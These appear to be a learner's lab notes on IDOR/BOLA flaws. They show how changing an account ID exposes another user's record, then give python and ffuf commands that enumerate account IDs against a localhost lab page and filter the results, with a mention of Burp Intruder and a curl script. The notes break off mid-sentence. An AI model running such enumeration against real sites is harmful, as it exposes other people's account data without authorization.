IDOR/BOLA - Insecure Direct Object Reference

Request a resource with object ID

Often in API but called BOLA:

Broken Object Level Authorization

We can change 1009 to 1010

Changing:

We get a different user.

Enumerate all the users?

Since we know users are in 1000+, we can make a script that has 1,2001 range:

python3 -c 'for i in range(1,2001): print(i)' > num.txt

FFUF:

ffuf -u 'http://localhost/labs/e0x02.php?account=FUZZ' -w num.txt

Filter for no users:

ffuf -u 'http://localhost/labs/e0x02.php?account=FUZZ' -w num.txt -fs 849

Filtering:

Burp Suite Intruder

OR

Make a script that uses all the numbers you found, uses curl to test on the website, and greps back:

Type: admin

based on this: